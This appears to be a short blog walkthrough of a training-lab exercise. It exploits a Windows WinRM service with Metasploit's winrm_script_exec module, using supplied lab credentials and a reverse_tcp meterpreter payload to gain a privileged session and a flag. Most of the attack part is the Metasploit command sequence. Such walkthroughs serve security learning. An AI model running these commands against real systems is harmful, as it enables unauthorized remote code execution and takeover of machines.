Hello readers! I hope you are well and safe, in this post you will learn to exploit a  vulnerable windows service WinRM using Powershell.

WinRM service is used for PowerShell remoting and WSMan is a cmdlet in PowerShell to manage WS-Management data on a local or remote computer. Read more about it from the following links to get a clear picture of what WSMan does.

You will see me exploiting wsman service to gain the access to the target machine

Reconnaissance

Using nmap to find open ports and services

So wsman is served from 5985 port. Let's find out whether it has any exploit or not

Exploitation

Using the Metasploit module and the authentication creds provided in the lab

msf6 > use exploit/windows/winrm/winrm_script_exec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/winrm/winrm_script_exec) > set username administrator
username => administrator
msf6 exploit(windows/winrm/winrm_script_exec) > set password tinkerbell
password => tinkerbell
msf6 exploit(windows/winrm/winrm_script_exec) > set force_vbs true 
force_vbs => true
msf6 exploit(windows/winrm/winrm_script_exec) > set rhosts 10.4.28.59
rhosts => 10.4.28.59
msf6 exploit(windows/winrm/winrm_script_exec) > run


Now wait for the stager to ship the meterpreter to the target system

You got your flag and a privileged session.

The awesome image used in today's article is from the 'World's Fastest Iceracer' series by Automotive Photographer Jerome Wassenaar from the Netherlands. Check out his website!